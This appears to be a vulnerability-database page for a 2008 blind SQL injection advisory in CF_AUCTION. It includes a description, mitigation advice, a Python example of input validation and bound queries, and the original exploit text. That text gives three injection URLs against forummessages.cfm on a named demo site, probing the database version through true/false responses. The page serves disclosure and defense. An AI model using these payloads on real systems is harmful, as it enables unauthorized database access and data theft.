Vendor: CF_AUCTION
By: AlpHaNiX
CVSS: 7.5 (HIGH)
Blind SQL Injection
CWE: 89
Product Name: CF_AUCTION
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CF_AUCTION

A Blind SQL Injection vulnerability exists in CF_AUCTION, which allows an attacker to execute arbitrary SQL commands on the underlying database. This can be exploited to gain access to sensitive data, modify data, or even execute system commands on the server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.
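
An added example, not code from CF_AUCTION or the original advisory: both layers of the mitigation above applied to the two numeric parameters of forummessages.cfm, written in Python against an in-memory SQLite table. The table, its columns and the function names are assumptions made for the illustration; in ColdFusion the binding step corresponds to cfqueryparam.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

def make_db():
    # Constructed stand-in table; the real CF_AUCTION schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE messages (topicnbr INTEGER, categorynbr INTEGER, body TEXT)")
    db.executemany("INSERT INTO messages VALUES (?, ?, ?)",
                   [(4, 2, "first post"), (4, 2, "reply"), (5, 2, "other topic")])
    return db

def int_param(query, name):
    """Layer 1: accept exactly one value made only of ASCII digits."""
    values = query.get(name, [])
    if len(values) != 1 or not (values[0].isascii() and values[0].isdigit()):
        raise ValueError(f"{name} must be a single non-negative integer")
    return int(values[0])

def select_messages(db, topic, category):
    """Layer 2: placeholders keep the values out of the SQL grammar."""
    rows = db.execute(
        "SELECT body FROM messages WHERE topicnbr = ? AND categorynbr = ? ORDER BY rowid",
        (topic, category))
    return [row[0] for row in rows]

def forum_messages(db, url):
    """Handler sketch: validate both parameters, then run the bound query."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return select_messages(db, int_param(query, "topicnbr"), int_param(query, "categorynbr"))

if __name__ == "__main__":
    db = make_db()
    clean = "/forummessages.cfm?topicnbr=4&categorynbr=2"
    tampered = "/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=5"
    print(forum_messages(db, clean))
    try:
        forum_messages(db, tampered)
    except ValueError as exc:
        print("rejected:", exc)
    # Binding alone: the whole string is compared as one value and matches nothing.
    print(select_messages(db, 4, "2 and substring(@@version,1,1)=5"))
```

Validation rejects the appended condition before any SQL runs, and binding means that even an unvalidated value is compared as data, so the TRUE/FALSE difference in responses disappears.
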

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : CF_AUCTION
#download : null
#Demo     : http://www.cfwebsite.com/


###########################################################################

#Exploits :

--=[BLIND SQL INJECTION]=--

http://www.cfwebsite.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=5   TRUE
http://www.cfwebsite.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=4   FALSE
http://www.cfwebsite.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=3   FALSE


###########################################################################

# milw0rm.com [2008-12-10]